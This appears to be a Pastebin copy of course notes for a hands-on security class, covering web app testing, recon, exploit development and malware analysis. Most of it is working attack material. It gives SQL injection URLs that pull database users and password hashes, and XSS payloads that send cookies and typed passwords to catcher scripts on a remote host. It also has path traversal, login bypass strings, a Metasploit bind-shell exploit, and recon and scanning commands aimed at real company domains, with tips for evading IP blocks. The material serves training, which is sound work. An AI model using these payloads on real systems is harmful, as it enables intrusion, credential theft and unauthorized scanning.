Advertisement
joemccray

Dahlgren Class

May 3rd, 2016
1,647
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Secure Software Development
  2. https://s3.amazonaws.com/StrategicSec-Files/SecureSoftwareDevelopment.zip
  3.  
  4.  
  5.  
  6.  
  7. ########################
  8. # Down & Dirty App Sec #
  9. ########################
  10.  
  11. Download VMWare Player if you are not currently running a version of Vmware that is newer than VMWare Workstation 11, Vmware Fusion 7, or Vmware Player 11. VMWare Player is free and you download it from here:
  12. https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
  13.  
  14.  
  15.  
  16. Download the course virtual machines:
  17. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
  18. username: strategicsec
  19. password: strategicsec
  20.  
  21.  
  22.  
  23. Start with simple Firefox Addons:
  24.  
  25. - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
  26. - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
  27. - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  28. - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  29. - Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  30.  
  31. A good list of web app testing add ons for Firefox:
  32. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40. ##################################
  41. # Basic: Web Application Testing #
  42. ##################################
  43.  
  44. Most people are going to tell you reference the OWASP Testing guide.
  45. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  46.  
  47. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  48.  
  49.  
  50. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  51.  
  52. 1. Does the website talk to a DB?
  53. - Look for parameter passing (ex: site.com/page.php?id=4)
  54. - If yes - try SQL Injection
  55.  
  56. 2. Can I or someone else see what I type?
  57. - If yes - try XSS
  58.  
  59. 3. Does the page reference a file?
  60. - If yes - try LFI/RFI
  61.  
  62. Let's start with some manual testing against 54.149.82.150
  63.  
  64.  
  65. Start here:
  66. http://54.149.82.150/
  67.  
  68.  
  69. There's no parameter passing on the home page so the answer to question 1 is NO.
  70. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  71.  
  72. Try an XSS in the search box on the home page:
  73. <script>alert(123);</script>
  74.  
  75. Doing this gives us the following in the address bar:
  76. http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
  77.  
  78. Ok, so we've verified that there is XSS in the search box.
  79.  
  80. Let's move on to the search box in the left of the page.
  81.  
  82. Let's give the newsletter signup box a shot
  83.  
  84. Moving on to the login page.
  85. http://54.149.82.150/login.aspx
  86.  
  87. I entered a single quote (') for both the user name and the password. I got the following error:
  88.  
  89. Let's try throwing a single quote (') in there:
  90.  
  91. http://54.149.82.150/bookdetail.aspx?id=2'
  92.  
  93.  
  94. I get the following error:
  95.  
  96. Unclosed quotation mark after the character string ''.
  97. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  98.  
  99. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110. #############################################################################
  111. # SQL Injection #
  112. # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
  113. #############################################################################
  114.  
  115.  
  116. - Another quick way to test for SQLI is to remove the paramter value
  117.  
  118.  
  119. #############################
  120. # Error-Based SQL Injection #
  121. #############################
  122. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  123. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  124. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  125. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  126. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  127. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  128. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  129. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  130. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  131.  
  132.  
  133.  
  134.  
  135. #############################
  136. # Union-Based SQL Injection #
  137. #############################
  138. http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
  139. http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
  140. http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
  141. http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
  142. http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
  143. http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
  144. http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
  145. http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
  146. http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
  147. http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  148.  
  149. We are using a union select statement because we are joining the developer's query with one of our own.
  150. Reference:
  151. http://www.techonthenet.com/sql/union.php
  152. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  153. It removes duplicate rows between the various SELECT statements.
  154.  
  155. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  156.  
  157. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  158.  
  159. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  160.  
  161. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  162. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  163. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  164. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  165.  
  166.  
  167.  
  168.  
  169.  
  170. - Another way is to see if you can get the backend to perform an arithmetic function
  171. http://54.149.82.150/bookdetail.aspx?id=(2)
  172. http://54.149.82.150/bookdetail.aspx?id=(4-2)
  173. http://54.149.82.150/bookdetail.aspx?id=(4-1)
  174.  
  175.  
  176.  
  177. http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
  178. http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
  179. http://54.149.82.150/bookdetail.aspx?id=1*1
  180. http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
  181. http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
  182. http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
  183. http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
  184. http://54.149.82.150/bookdetail.aspx?id=2 &0#
  185.  
  186.  
  187.  
  188.  
  189.  
  190. ###############################
  191. # Blind SQL Injection Testing #
  192. ###############################
  193. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  194.  
  195. 3 - Total Characters
  196. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  197. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  198. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  199.  
  200. Let's go for a quick check to see if it's DBO
  201. http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  202.  
  203. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  204.  
  205. D - 1st Character
  206. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  207. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  208. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  209. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  210.  
  211. B - 2nd Character
  212. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  213. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  214.  
  215. O - 3rd Character
  216. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  217. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  218. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  219. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  220. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  221. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232. ###################################################################
  233. # What is XSS #
  234. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  235. ###################################################################
  236.  
  237. OK - what is Cross Site Scripting (XSS)
  238.  
  239. 1. Use Firefox to browse to the following location:
  240.  
  241. http://54.172.112.249/xss_practice/
  242.  
  243. A really simple search page that is vulnerable should come up.
  244.  
  245.  
  246.  
  247.  
  248. 2. In the search box type:
  249.  
  250. <script>alert('So this is XSS')</script>
  251.  
  252.  
  253. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  254. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  255.  
  256.  
  257. 3. In the search box type:
  258.  
  259. <script>alert(document.cookie)</script>
  260.  
  261.  
  262. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  263. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  264.  
  265. 4. Now replace that alert script with:
  266.  
  267. <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  268.  
  269.  
  270. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  271.  
  272.  
  273. 5. Now view the stolen cookie at:
  274. http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  275.  
  276.  
  277. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284. ############################
  285. # A Better Way To Demo XSS #
  286. ############################
  287.  
  288.  
  289. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  290.  
  291.  
  292. Use Firefox to browse to the following location:
  293.  
  294. http://54.172.112.249/xss_practice/
  295.  
  296.  
  297.  
  298. Paste this in the search box
  299. ----------------------------
  300.  
  301.  
  302. Option 1
  303. --------
  304.  
  305. <script>
  306. password=prompt('Your session is expired. Please enter your password to continue',' ');
  307. document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
  308. </script>
  309.  
  310.  
  311. Now view the stolen cookie at:
  312. http://54.172.112.249/xss_practice/passwords.html
  313.  
  314.  
  315.  
  316. Option 2
  317. --------
  318. <script>
  319. username=prompt('Please enter your username',' ');
  320. password=prompt('Please enter your password',' ');
  321. document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  322. </script>
  323.  
  324.  
  325.  
  326.  
  327. Now view the stolen cookie at:
  328. http://54.172.112.249/xss_practice/username_password_logs.html
  329.  
  330.  
  331.  
  332.  
  333. #########################################
  334. # Let's kick it up a notch with ASP.NET #
  335. # http://54.200.178.220/ #
  336. #########################################
  337.  
  338.  
  339. The trading Web App is on http://54.200.178.220/
  340.  
  341.  
  342. Try the following in the search box:
  343. <script>alert(123);</script>
  344. ' or 1=1
  345. ' and a=a
  346. 1=1
  347. Joe'+OR+1=1;--
  348.  
  349.  
  350. <script>alert(123);</script>
  351.  
  352. Open a new tab in firefox and try this:
  353. http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
  354.  
  355.  
  356. Try the contact us form.
  357. Open a new tab in firefox and try this:
  358. http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
  359.  
  360. Try this on the inquiry form:
  361. Joe McCray
  362. 1234567890
  363. joe@strategicsec.com') waitfor delay '00:00:10'--
  364.  
  365.  
  366. Login Box:
  367.  
  368. ' or 1=1 or ''='
  369. anything (click login instead of pressing enter)
  370.  
  371.  
  372.  
  373. Tamper Data: (notice 2 session IDs)
  374.  
  375. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  376. IsAdmin=yes;
  377. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  378.  
  379.  
  380.  
  381. Profile - Detail (tamper data)
  382. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  383. joe|set
  384.  
  385.  
  386. xss_upload.txt (Upload Bulk Order)
  387. <script>alert(123);</script>
  388.  
  389.  
  390.  
  391.  
  392. ###############################
  393. # How much fuzzing is enough? #
  394. ###############################
  395. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  396.  
  397. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  398.  
  399.  
  400. Step 1: Ask yourself the 3 questions per page of the site.
  401.  
  402. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  403.  
  404. Step 3: When you load your fuzz strings - use the following decision tree
  405.  
  406. - Are the fuzz strings causing a default error message (example 404)?
  407. - If this is the case then it is most likely NOT vulnerable
  408.  
  409. - Are the fuzz strings causing a WAF or LB custom error message?
  410. - If this is the case then you need to find an encoding method to bypass
  411.  
  412.  
  413. - Are the fuzz strings causing an error message that discloses the backend type?
  414. - If yes, then identify DB type and find correct syntax to successfully exploit
  415. - Some example strings that I use are:
  416. '
  417. "
  418. () <----- Take the parameter value and put it in parenthesis
  419. (5-1) <----- See if you can perform an arithmetic function
  420.  
  421.  
  422. - Are the fuzz strings rendering executable code?
  423. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  424. - Some example strings that I use are:
  425. <b>hello</b>
  426. <u>hello</u>
  427. <script>alert(123);</script>
  428. <script>alert(xss);</script>
  429. <script>alert('xss');</script>
  430. <script>alert("xss");</script>
  431.  
  432.  
  433.  
  434.  
  435.  
  436.  
  437. ############################
  438. # Trading Web App with WAF #
  439. # http://54.213.131.105 #
  440. ############################
  441.  
  442.  
  443. Try the following in the search box:
  444. <script>alert(123);</script>
  445. <script>alert(123);</script
  446. <script>alert(123)
  447. <script>alert
  448. <script>
  449. <script
  450. <scrip
  451. <scri
  452. <scr
  453. <sc
  454. <s
  455. <p
  456. <
  457. < s
  458. Joe'+OR+1=1;--
  459.  
  460.  
  461. Open a new tab in firefox and try this:
  462. http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
  463.  
  464.  
  465. xss_upload.txt (Upload Bulk Order)
  466. <script>alert(123);</script>
  467.  
  468.  
  469. Login Box:
  470.  
  471. ' or 1=1 or ''='
  472. anything
  473.  
  474.  
  475.  
  476. Tamper Data: (notice 2 session IDs)
  477.  
  478. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  479. IsAdmin=yes;
  480. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  481.  
  482.  
  483.  
  484. Profile - Detail (tamper data)
  485. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  486. joe|set
  487.  
  488.  
  489.  
  490.  
  491.  
  492.  
  493.  
  494. ###########################################################
  495. # Attacking an Oracle/JSP based WebApp with SQL Injection #
  496. ###########################################################
  497.  
  498.  
  499.  
  500.  
  501.  
  502. http://54.69.156.253:8081/bookcompany/
  503.  
  504.  
  505. user: a' OR 'a'='a
  506. pass: a' OR 'a'='a
  507.  
  508.  
  509.  
  510.  
  511.  
  512.  
  513.  
  514. http://54.69.156.253:8081/bookcompany/author.jsp?id=111
  515.  
  516.  
  517. [ Search by Username ] Joe' OR 'a'='a
  518.  
  519.  
  520.  
  521.  
  522.  
  523.  
  524.  
  525.  
  526.  
  527.  
  528.  
  529.  
  530. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
  531.  
  532.  
  533.  
  534. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
  535.  
  536.  
  537.  
  538.  
  539.  
  540.  
  541.  
  542.  
  543.  
  544.  
  545.  
  546.  
  547.  
  548.  
  549.  
  550. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
  551.  
  552.  
  553. Host is running:
  554.  
  555.  
  556.  
  557.  
  558.  
  559. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
  560.  
  561. User is:
  562.  
  563.  
  564.  
  565.  
  566.  
  567. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
  568.  
  569. Current database is:
  570.  
  571.  
  572.  
  573.  
  574.  
  575.  
  576.  
  577. ###################################################
  578. # Day 1: Identifying External Security Mechanisms #
  579. ###################################################
  580.  
  581. sudo /sbin/iptables -F
  582. cd /home/strategicsec/toolz
  583.  
  584.  
  585.  
  586. ###########################
  587. # Target IP Determination #
  588. ###########################
  589.  
  590. perl blindcrawl.pl -d motorola.com
  591.  
  592. -- Take each IP address and look ip up here:
  593. http://www.networksolutions.com/whois/index.jsp
  594.  
  595. cd ~/toolz/fierce2
  596. fierce -dns motorola.com
  597. cd ..
  598.  
  599. Zone Transfer fails on most domains, but here is an example of one that works:
  600. dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
  601.  
  602.  
  603. cd ~/toolz/
  604. ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
  605.  
  606.  
  607. sudo nmap -sL 148.87.1.0-255
  608. sudo nmap -sL 148.87.1.0-255 | grep oracle
  609.  
  610. sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255 Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
  611.  
  612.  
  613.  
  614. ###########################
  615. # Load Balancer Detection #
  616. ###########################
  617.  
  618. Here are some options to use for identifying load balancers:
  619. - news.netcraft.com
  620. - Firefox LiveHTTP Headers
  621.  
  622.  
  623. Here are some command-line options to use for identifying load balancers:
  624.  
  625. dig google.com
  626.  
  627. cd ~/toolz
  628. ./lbd-0.1.sh google.com
  629.  
  630.  
  631. halberd microsoft.com
  632. halberd motorola.com
  633. halberd oracle.com
  634.  
  635.  
  636. ##################################
  637. # Intrusion Prevention Detection #
  638. ##################################
  639.  
  640.  
  641. osstmm-afd -P HTTP -t www.strategicsec.com -v
  642.  
  643. cat /etc/xinetd.d/ssltest
  644.  
  645. cat /home/strategicsec/toolz/ssl_proxy.sh
  646.  
  647. service xinetd status
  648.  
  649. osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v
  650.  
  651. ****** If you are getting your IP blocked you can use a service like AceVPN to give you multiple IPs to launches your tests from. ******
  652.  
  653.  
  654.  
  655. ######################################
  656. # Web Application Firewall Detection #
  657. ######################################
  658.  
  659. cd ~/toolz/wafw00f
  660. python wafw00f.py http://www.oracle.com
  661. python wafw00f.py http://www.strategicsec.com
  662.  
  663.  
  664. cd ~/toolz/
  665. sudo nmap -p 80 --script http-waf-detect.nse oracle.com
  666.  
  667. sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov
  668.  
  669.  
  670.  
  671.  
  672. #######################################################
  673. # Day 1: 3rd Party Scanning, and scanning via proxies #
  674. #######################################################
  675.  
  676. http://www.shodanhq.com/
  677.  
  678. Create a FREE account and login
  679.  
  680. net:129.188.8.0/24
  681.  
  682.  
  683.  
  684. cd /home/strategicsec/toolz/
  685. perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
  686.  
  687.  
  688.  
  689. sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: ocks4 127.0.0.1 9050
  690.  
  691.  
  692.  
  693.  
  694. ----------------------------------------------------------------------
  695. vi ~/toolz/fix-proxychains-dns.sh
  696.  
  697. #!/bin/bash
  698. # This script is called by proxychains to resolve DNS names
  699. # DNS server used to resolve names
  700. # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
  701. DNS_SERVER=4.2.2.2
  702.  
  703. if [ $# = 0 ] ; then
  704. echo " usage:"
  705. echo " proxyresolv <hostname> "
  706. exit
  707. fi
  708.  
  709. export LD_PRELOAD=libproxychains.so.3
  710. dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
  711. -----------------------------------------------------------------------
  712.  
  713.  
  714. sudo ntpdate pool.ntp.org
  715.  
  716. tor-resolve strategicsec.com
  717.  
  718. proxychains nmap -sT -p80 204.244.123.113
  719.  
  720. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 204.244.123.113
  721.  
  722.  
  723. If you want to block tor exit nodes you get a list from here:
  724. http://rules.emergingthreats.net/blockrules/emerging-tor-BLOCK.rules
  725.  
  726. You probably should also block things like:
  727. http://rules.emergingthreats.net/blockrules/emerging-rbn-BLOCK.rules <----- Russian Business Network IPs
  728. http://rules.emergingthreats.net/blockrules/emerging-botcc.rules <----- BotNet Command and Control Servers
  729. http://rules.emergingthreats.net/blockrules/emerging-rbn-malvertisers-BLOCK.rules <----- Malware Advertisers
  730.  
  731. Here is where you can download the perl script to automatically update your firewall each day (create a cron job for it).
  732. http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules
  733.  
  734.  
  735.  
  736.  
  737.  
  738.  
  739.  
  740. ######################
  741. # Simple Exploit Dev #
  742. ######################
  743.  
  744. - Inside of your Windows7 VM - download the following file to the Desktop:
  745. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  746.  
  747. - Extract this zip file to your Desktop
  748.  
  749. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  750.  
  751. - Open a new command prompt and type:
  752. nc localhost 9999
  753.  
  754. - In the new command prompt window where you ran nc type:
  755. HELP
  756.  
  757. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  758. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  759.  
  760. - Now double-click on 1-simplefuzzer.py
  761. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  762.  
  763.  
  764. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  765.  
  766. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  767.  
  768. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  769.  
  770. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  771.  
  772. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  773.  
  774. - Calculate the distance to EIP by running script 3-3000chars.py
  775. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  776.  
  777. 4-count-chars-to-EIP.py
  778. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  779. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  780.  
  781. 5-2006char-eip-check.py
  782. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  783.  
  784. 6-jmp-esp.py
  785. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  786.  
  787. 7-first-exploit
  788. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  789.  
  790. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  791.  
  792.  
  793. ------------------------------
  794.  
  795. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  796.  
  797. vi vulnserv.rb
  798.  
  799.  
  800.  
  801. cd ~/toolz/metasploit
  802.  
  803. ./msfconsole
  804.  
  805.  
  806.  
  807. use exploit/windows/misc/vulnserv
  808. set PAYLOAD windows/meterpreter/bind_tcp
  809. set RHOST 192.168.153.133
  810. set RPORT 9999
  811. exploit
  812.  
  813.  
  814.  
  815.  
  816. ###############################
  817. # InfoSec Program Development #
  818. ###############################
  819. Download this file for program development walk-through:
  820. https://s3.amazonaws.com/StrategicSec-Files/Build-InfoSec-Assessment-Capability.zip
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827.  
  828. ############################
  829. # Download the Analysis VM #
  830. ############################
  831. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  832. user: malware
  833. pass: malware
  834.  
  835.  
  836. - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
  837.  
  838. - After logging please open a terminal window and type the following commands:
  839.  
  840. cd Desktop/
  841.  
  842.  
  843. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  844.  
  845. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  846. wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
  847.  
  848. unzip malware-password-is-infected.zip
  849. infected
  850.  
  851. file malware.exe
  852.  
  853. mv malware.exe malware.pdf
  854.  
  855. file malware.pdf
  856.  
  857. mv malware.pdf malware.exe
  858.  
  859. hexdump -n 2 -C malware.exe
  860.  
  861. ***What is '4d 5a' or 'MZ'***
  862. Reference:
  863. http://www.garykessler.net/library/file_sigs.html
  864.  
  865.  
  866. objdump -x malware.exe
  867.  
  868. strings malware.exe
  869.  
  870. strings --all malware.exe | head -n 6
  871.  
  872. strings malware.exe | grep -i dll
  873.  
  874. strings malware.exe | grep -i library
  875.  
  876. strings malware.exe | grep -i reg
  877.  
  878. strings malware.exe | grep -i hkey
  879.  
  880. strings malware.exe | grep -i hku
  881.  
  882. - We didn't see anything like HKLM, HKCU or other registry type stuff
  883.  
  884. strings malware.exe | grep -i irc
  885.  
  886. strings malware.exe | grep -i join
  887.  
  888. strings malware.exe | grep -i admin
  889.  
  890. strings malware.exe | grep -i list
  891.  
  892.  
  893. - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  894.  
  895. sudo apt-get install -y python-pefile
  896.  
  897. vi analyse_malware.py
  898.  
  899. python analyse_malware.py malware.exe
  900.  
  901.  
  902.  
  903.  
  904. Building a Malware Scanner
  905. --------------------------
  906.  
  907. mkdir ~/Desktop/malwarescanner
  908.  
  909. cd ~/Desktop/malwarescanner
  910.  
  911. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  912.  
  913. unzip master.zip
  914.  
  915. cd malwarescanner-master/
  916.  
  917. python scanner.py -h
  918.  
  919. cat strings.txt
  920.  
  921. cat hashes.txt
  922.  
  923. mkdir ~/Desktop/malcode
  924.  
  925. cp ~/Desktop/malware.exe ~/Desktop/malcode
  926.  
  927. python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
  928.  
  929. cp ~/Desktop/
  930.  
  931.  
  932.  
  933. #####################################################
  934. # Analyzing Macro Embedded Malware #
  935. # Reference: #
  936. # https://jon.glass/analyzes-dridex-malware-p1/ #
  937. #####################################################
  938. cp ~/Desktop/
  939.  
  940. - Create a FREE account on:
  941. https://malwr.com/account/signup/
  942.  
  943. - Grab the malware from:
  944. https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
  945.  
  946. file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  947.  
  948. cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  949.  
  950.  
  951.  
  952.  
  953. sudo pip install olefile
  954.  
  955. mkdir ~/Desktop/oledump
  956.  
